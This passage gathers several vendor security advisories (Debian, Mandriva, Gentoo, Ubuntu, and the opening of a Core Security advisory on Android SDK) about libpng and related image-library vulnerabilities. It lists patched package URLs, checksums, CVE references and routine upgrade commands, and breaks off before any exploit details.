  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb
    Size/MD5 checksum:   287802 470918bf3d543a1128df53d4bed78b3f
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb
    Size/MD5 checksum:   182372 df321c1623004da3cf1daacae952e8b6
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb
    Size/MD5 checksum:    86746 975dccb76f777be09e8e5353704bf6bf
amd64 architecture (AMD x86_64 (AMD64))
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb
    Size/MD5 checksum:    71944 3f3bdfdee4699b4b3e5c793686330036
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb
    Size/MD5 checksum:   254598 122c139abf34eb461eca9847ec9dffe7
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb
    Size/MD5 checksum:   167190 1c17a5378b2e6b8fa8760847510f208b
arm architecture (ARM)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb
    Size/MD5 checksum:   245788 9d3fe182d56caad3f9d8a436ca109b57
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb
    Size/MD5 checksum:    64754 81ee041de30e2e5343d38965ab0645c1
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb
    Size/MD5 checksum:   160222 5741adc357ec8f3f09c4c8e72f02ec88
armel architecture (ARM EABI)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb
    Size/MD5 checksum:    67178 71747c7d6f7bffde46bb38055948b781
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb
    Size/MD5 checksum:   246680 bb9df968f72c62d5adceab0079c86e02
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb
    Size/MD5 checksum:   163028 60bf255a23031c9c105d3582ed2c21bd
hppa architecture (HP PA RISC)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb
    Size/MD5 checksum:   261298 a0bac6595474dc5778c764fab4acd9be
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb
    Size/MD5 checksum:   170170 de217ce54775d5f648ad369f4ce7cb72
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb
    Size/MD5 checksum:    74124 affd4f1155bd1d571615b6c767886974
i386 architecture (Intel ia32)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb
    Size/MD5 checksum:    70314 865ea6726b205467e770d56d1530fdd2
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb
    Size/MD5 checksum:   165892 cfcd37b7eee72625d13f09328bc24e23
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb
    Size/MD5 checksum:   247056 bc860a52608d966576f581c27e89a86c
ia64 architecture (Intel ia64)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb
    Size/MD5 checksum:   305532 d6f329a47a523353fcd527c48abb078c
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb
    Size/MD5 checksum:   207604 78b003ade0b48d1510f436f2e5008588
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb
    Size/MD5 checksum:   112070 a0f1e5e8a85bcc1995faa1e031f5e16e
mips architecture (MIPS (Big Endian))
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb
    Size/MD5 checksum:    68198 a68e0ba1f7a39bd9984414f4160de5bc
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb
    Size/MD5 checksum:   262138 f3580912592abe14609134cab2242728
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb
    Size/MD5 checksum:   163666 0c9f75230c396553e6062eb397d6b95c
mipsel architecture (MIPS (Little Endian))
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb
    Size/MD5 checksum:   163956 dfda7e322af96e8ae5104cfd9f955e92
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb
    Size/MD5 checksum:    68468 9c357d2d831dca03ed0887c58a18c523
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb
    Size/MD5 checksum:   262162 a1d0ba1b7adb92a95180e6d65b398b5b
powerpc architecture (PowerPC)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb
    Size/MD5 checksum:    70814 3053467f8b8864802cc7261742abfa00
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb
    Size/MD5 checksum:   166240 13acfd773d2a31bd555ac1936411fe95
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb
    Size/MD5 checksum:   253322 d4a722d84e5c2f263d72a59dea00ce17
s390 architecture (IBM S/390)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb
    Size/MD5 checksum:   253696 bc748b49195dcd01b5288349e3e85510
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb
    Size/MD5 checksum:    73624 f35735be37fc376c56941795a185c742
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb
    Size/MD5 checksum:   169052 4cf962619d634ea59a39d14c32134594
sparc architecture (Sun SPARC/UltraSPARC)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb
    Size/MD5 checksum:    66216 07bcad5c11908d2fe6d358dfc94d9051
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb
    Size/MD5 checksum:   247212 f388365559e6b9313aa6048c6fa341f9
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb
    Size/MD5 checksum:   162316 16f01a96b1fec79e9614df831dba6a05
  These files will probably be moved into the stable distribution on
  its next update. 
 
 The updated packages have been patched to correct this issue. 
 _______________________________________________________________________
 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445
 http://www.cert.org/advisories/684664
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 4483193885966f919f283594719a0a90  2007.0/i586/libpng3-1.2.12-2.3mdv2007.0.i586.rpm
 d13427f7a6494c82a8becec26aaa158f  2007.0/i586/libpng3-devel-1.2.12-2.3mdv2007.0.i586.rpm
 86e2b902df20f46bbab8c198be7bb623  2007.0/i586/libpng3-static-devel-1.2.12-2.3mdv2007.0.i586.rpm 
 2351bce470227141eecf5a3adb303ce7  2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm
 Mandriva Linux 2007.0/X86_64:
 80168137deb6e23d5a2fb6e8f3abc2ef  2007.0/x86_64/lib64png3-1.2.12-2.3mdv2007.0.x86_64.rpm
 b45baf5195b6ffd1d32b5829ff861b50  2007.0/x86_64/lib64png3-devel-1.2.12-2.3mdv2007.0.x86_64.rpm
 9e4f1d18db609adc5c2f92629814e360  2007.0/x86_64/lib64png3-static-devel-1.2.12-2.3mdv2007.0.x86_64.rpm 
 2351bce470227141eecf5a3adb303ce7  2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm
 Mandriva Linux 2007.1:
 300ed9a63f60a1ee16ce4e5caa71f96b  2007.1/i586/libpng3-1.2.13-2.1mdv2007.1.i586.rpm
 fdd3c3cefc587622382d37cd5fe2795e  2007.1/i586/libpng3-devel-1.2.13-2.1mdv2007.1.i586.rpm
 d6b13aa08877aec2aaf165203d2a6817  2007.1/i586/libpng3-static-devel-1.2.13-2.1mdv2007.1.i586.rpm 
 00e882bf543c8730d656417304f3b4e1  2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm
 Mandriva Linux 2007.1/X86_64:
 f1289336b45eb58bc2975011086fbfa9  2007.1/x86_64/lib64png3-1.2.13-2.1mdv2007.1.x86_64.rpm
 8dc0504ac8c6ed8e6c5f641c738df144  2007.1/x86_64/lib64png3-devel-1.2.13-2.1mdv2007.1.x86_64.rpm
 d0b9f63131ecbfe01db295d15903fd40  2007.1/x86_64/lib64png3-static-devel-1.2.13-2.1mdv2007.1.x86_64.rpm 
 00e882bf543c8730d656417304f3b4e1  2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm
 Corporate 3.0:
 9c0077ae596e6a2340ed6e08ab6c437c  corporate/3.0/i586/libpng3-1.2.5-10.8.C30mdk.i586.rpm
 2f44c9f5639aff57948b64cf845efa39  corporate/3.0/i586/libpng3-devel-1.2.5-10.8.C30mdk.i586.rpm
 e1638f0497b35341796bb74ccb5a95e7  corporate/3.0/i586/libpng3-static-devel-1.2.5-10.8.C30mdk.i586.rpm 
 5905453feaf135e67bbdf4fecbc55335  corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm
 Corporate 3.0/X86_64:
 632b1254a5b2ee4def5ac2f98bc7bd4c  corporate/3.0/x86_64/lib64png3-1.2.5-10.8.C30mdk.x86_64.rpm
 b4ad3f3a34be89a22c7bdfcb8b9f351d  corporate/3.0/x86_64/lib64png3-devel-1.2.5-10.8.C30mdk.x86_64.rpm
 419f3faddaeb3cbfa3ca020630858682  corporate/3.0/x86_64/lib64png3-static-devel-1.2.5-10.8.C30mdk.x86_64.rpm 
 5905453feaf135e67bbdf4fecbc55335  corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm
 Corporate 4.0:
 a444aa0f9b3c0e5bac0562b3274806a5  corporate/4.0/i586/libpng3-1.2.8-1.3.20060mlcs4.i586.rpm
 25542984f9b920e9ab9197d383c201b9  corporate/4.0/i586/libpng3-devel-1.2.8-1.3.20060mlcs4.i586.rpm
 a0c238ea1c16f892b704b5055fcc340d  corporate/4.0/i586/libpng3-static-devel-1.2.8-1.3.20060mlcs4.i586.rpm 
 9442bef36dbda9e9518ce367a7569d90  corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm
 Corporate 4.0/X86_64:
 2ff58096a6a2961e15719aa35107fda6  corporate/4.0/x86_64/lib64png3-1.2.8-1.3.20060mlcs4.x86_64.rpm
 78ecdacb1033eecfbf48e464d3106bb1  corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm
 85ee7effc74676da27c1c2c1219b97a7  corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm 
 9442bef36dbda9e9518ce367a7569d90  corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm
 Multi Network Firewall 2.0:
 ea358d9ef4e412851f89abac96d015b7  mnf/2.0/i586/libpng3-1.2.5-10.8.M20mdk.i586.rpm 
 3068b2316e8225377b88dcaedbadb878  mnf/2.0/SRPMS/libpng-1.2.5-10.8.M20mdk.src.rpm
 _______________________________________________________________________
 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:
  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
 You can view other update advisories for Mandriva Linux at:
  http://www.mandriva.com/security/advisories
 If you want to report vulnerabilities, please contact
  security_(at)_mandriva.com
 _______________________________________________________________________
 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFGZcKYmqjQ0CJFipgRAiL/AKDsmAXcJqycmwk5iMfPgWrV8Rl98gCgoeUN
fefbLet+er8fbszmcgzIKUo=
=rUB+
-----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201412-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 Severity: Normal
    Title: AMD64 x86 emulation base libraries: Multiple vulnerabilities
     Date: December 12, 2014
     Bugs: #196865, #335508, #483632, #508322
       ID: 201412-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in AMD64 x86 emulation base
libraries, the worst of which may allow remote execution of arbitrary
code. 
Background
==========
AMD64 x86 emulation base libraries provides pre-compiled 32-bit
libraries. 
Affected packages
=================
    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  app-emulation/emul-linux-x86-baselibs
                               < 20140406-r1           >= 20140406-r1
Description
===========
Multiple vulnerabilities have been discovered in AMD64 x86 emulation
base libraries. Please review the CVE identifiers referenced below for
details. 
Workaround
==========
There is no known workaround at this time. 
Resolution
==========
All users of the AMD64 x86 emulation base libraries should upgrade to
the latest version:
  # emerge --sync
  # emerge -1av ">=app-emulation/emul-linux-x86-baselibs-20140406-r1"
NOTE: One or more of the issues described in this advisory have been
fixed in previous updates. They are included in this advisory for the
sake of completeness. It is likely that your system is already no
longer affected by them. 
References
==========
[  1 ] CVE-2007-0720
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0720
[  2 ] CVE-2007-1536
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1536
[  3 ] CVE-2007-2026
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2026
[  4 ] CVE-2007-2445
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2445
[  5 ] CVE-2007-2741
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741
[  6 ] CVE-2007-3108
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3108
[  7 ] CVE-2007-4995
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4995
[  8 ] CVE-2007-5116
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5116
[  9 ] CVE-2007-5135
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5135
[ 10 ] CVE-2007-5266
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5266
[ 11 ] CVE-2007-5268
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5268
[ 12 ] CVE-2007-5269
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5269
[ 13 ] CVE-2007-5849
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5849
[ 14 ] CVE-2010-1205
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205
[ 15 ] CVE-2013-0338
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338
[ 16 ] CVE-2013-0339
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0339
[ 17 ] CVE-2013-1664
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664
[ 18 ] CVE-2013-1969
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969
[ 19 ] CVE-2013-2877
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877
[ 20 ] CVE-2014-0160
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0160
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
 http://security.gentoo.org/glsa/glsa-201412-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org. 
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s). 
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license. 
http://creativecommons.org/licenses/by-sa/2.5
. =========================================================== 
Ubuntu Security Notice USN-472-1              June 11, 2007
libpng vulnerability
CVE-2007-2445
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu. 
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
  libpng12-0                               1.2.8rel-5ubuntu0.2
Ubuntu 6.10:
  libpng12-0                               1.2.8rel-5.1ubuntu0.2
Ubuntu 7.04:
  libpng12-0                               1.2.15~beta5-1ubuntu1
After a standard system upgrade you need to reboot your computer to
effect the necessary changes. 
Details follow:
It was discovered that libpng did not correctly handle corrupted CRC
in grayscale PNG images. 
Updated packages for Ubuntu 6.06 LTS:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz
      Size/MD5:    16483 713a6e035fa256e4cb822fb5fc88769b
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc
      Size/MD5:      652 bc4f3f785816684c54d62947d53bc0db
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
      Size/MD5:   510681 cac1512878fb98f2456df6dc50bc9bc7
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb
      Size/MD5:      846 76eab5d9a96efa186d66cf299a4f6032
  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb
      Size/MD5:    69484 078e25586525c4e83abf08c736fa6bd8
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb
      Size/MD5:   113888 46fce5d27ac4b2dea9cf4deb633f824e
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb
      Size/MD5:   247528 68879285068cda170eef5a5f56594a1c
  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb
      Size/MD5:    66932 12cafbea44a3e7cf109eb24cb47aa557
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb
      Size/MD5:   111396 3a93335c2a072b2e2c94bc2cc0b3d77e
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb
      Size/MD5:   239662 64029c30dac5152c97e1a0d864c981d0
  powerpc architecture (Apple Macintosh G3/G4/G5)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb
      Size/MD5:    66304 0cbf98391b6c3219f83cd24cefe0343c
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb
      Size/MD5:   110828 62c7a8ccc58c86414bcd170c394f8240
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb
      Size/MD5:   245220 1171c8638ec8ebc2c81f53706885b692
  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb
      Size/MD5:    63824 e66313895e489a36c2f438343fa3e0d4
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb
      Size/MD5:   108534 73ccb876f761c76b3518b8ca81e80485
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb
      Size/MD5:   240048 5b19c41bbc639ee717fdacd4d81533e1
Updated packages for Ubuntu 6.10:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz
      Size/MD5:    16597 4ff19b636ab120a3fc4cee767171aa4f
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc
      Size/MD5:      659 5769690df3c57a56d08aa8bf11013a42
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
      Size/MD5:   510681 cac1512878fb98f2456df6dc50bc9bc7
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb
      Size/MD5:      888 44f3267b52e89fc605f350b4fc347e45
  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb
      Size/MD5:    68992 105702504b783f464dff9ddd48de5ab0
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb
      Size/MD5:   113542 876f5c1a3a1f6b4bf828edcbabe0702e
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb
      Size/MD5:   247132 75d920fe60a5d4f356ccb43d8d5a98ed
  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb
      Size/MD5:    69932 53783b0d13fd194f8cc9f19e1edc63d7
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb
      Size/MD5:   114634 1b40abad309e133326ffdce859734610
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb
      Size/MD5:   242882 3dca0a0938a43308465c8987f1357160
  powerpc architecture (Apple Macintosh G3/G4/G5)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb
      Size/MD5:    67606 088844733b580984e1a3b79001a27511
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb
      Size/MD5:   112228 6024c0c9d455cfdaa8a38e89d6a53148
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb
      Size/MD5:   246684 e45d2830ca5bdf0747ea0d436fafc20e
  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb
      Size/MD5:    64656 55d6e7740ec8a9eddcbbfdada56a5f63
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb
      Size/MD5:   109396 0b522137b1f4b2a34f990efc9dbd81df
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb
      Size/MD5:   241064 e679e908623c68c5865fbf2c24c46973
Updated packages for Ubuntu 7.04:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz
      Size/MD5:    14344 16526f313e1ee650074edd742304ec53
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc
      Size/MD5:      819 b28af76731dfe368e48dfcd554d7b583
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz
      Size/MD5:   829038 77ca14fcee1f1f4daaaa28123bd0b22d
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb
      Size/MD5:      936 dcec28b3cf4b8ee22c6a1229fdbd2e84
  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb
      Size/MD5:    70656 b4fa5b37b54fee32dd7404c64b696192
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb
      Size/MD5:   189594 7e36d8e73bd47dbb19afd7cd0099335a
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb
      Size/MD5:   179950 c575d8c9699c971ec7682e52e37590b7
  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb
      Size/MD5:    68246 c81ffc4cd0359a1ce1e73eb99d8608f6
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb
      Size/MD5:   187234 09dcea1e3394a6d25565b23774d805db
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb
      Size/MD5:   171520 ac3fb45b36ec32b1bac4734eef162c49
  powerpc architecture (Apple Macintosh G3/G4/G5)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb
      Size/MD5:    70652 147c89e36570990d5e084fc3a8933ed2
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb
      Size/MD5:   189548 00b81b16632e789ab20bab04dbcd586c
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb
      Size/MD5:   179128 61c51aafc326420b202c0f2ce6d5abfd
  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb
      Size/MD5:    66396 faff3d313cdc64f273eda1a5d01c2e0a
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb
      Size/MD5:   185312 249165d75936ab8cfc2fa1aef68a5ee6
    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb
      Size/MD5:   173800 a40164cd4995c6ed795219157e6d598e
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
*Advisory Information*
Title: Multiple vulnerabilities in Google's Android SDK
Advisory ID: CORE-2008-0124
Advisory URL: http://www.coresecurity.com/?action=item&id=2148
Date published: 2008-03-04
Date of last update: 2008-03-04
Vendors contacted: Google
Release mode: Coordinated release
*Vulnerability Information*
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005	
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269	
*Vulnerability Description*
Android is project promoted primarily by Google through the Open Handset
Alliance aimed at providing a complete set of software for mobile
devices: an operating system, middleware and key mobile applications
[1]. Although the project is currently in a development phase and has
not made an official release yet, several vendors of mobile chips have
unveiled prototype phones built using development releases of the
platform at the Mobile World Congress [2]. Development using the Android
platform gained activity early in 2008 as a result of Google's launch of
the Android Development Challenge which includes $10 million USD in
awards [3] for which a Software Development Kit (SDK) was made available
in November 2007. 
 The Android Software Development Kit includes a fully functional
operating system, a set of core libraries, application development
frameworks, a virtual machine for executing application and a phone
emulator based on the QEMU emulator [4]. Public reports as of February
27th, 2008 state that the Android SDK has been downloaded 750,000 times
since November 2007 [5]. 
 Several vulnerabilities have been found in Android's core libraries for
processing graphic content in some of the most used image formats (PNG,
GIF an BMP). While some of these vulnerabilities stem from the use of
outdated and vulnerable open source image processing libraries other
were introduced by native Android code that use them or that implements
new functionality. 
 Exploitation of these vulnerabilities to yield complete control of a
phone running the Android platform has been proved possible using the
emulator included in the SDK, which emulates phone running the Android
platform on an ARM microprocessor. 
 This advisory contains technical descriptions of these security bugs,
including a proof of concept exploit to run arbitrary code, proving the
possibility of running code on Android stack (over an ARM architecture)
via a binary exploit. 
*Vulnerable Packages*
.  Android SDK m3-rc37a and earlier are vulnerable several bugs in
components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of
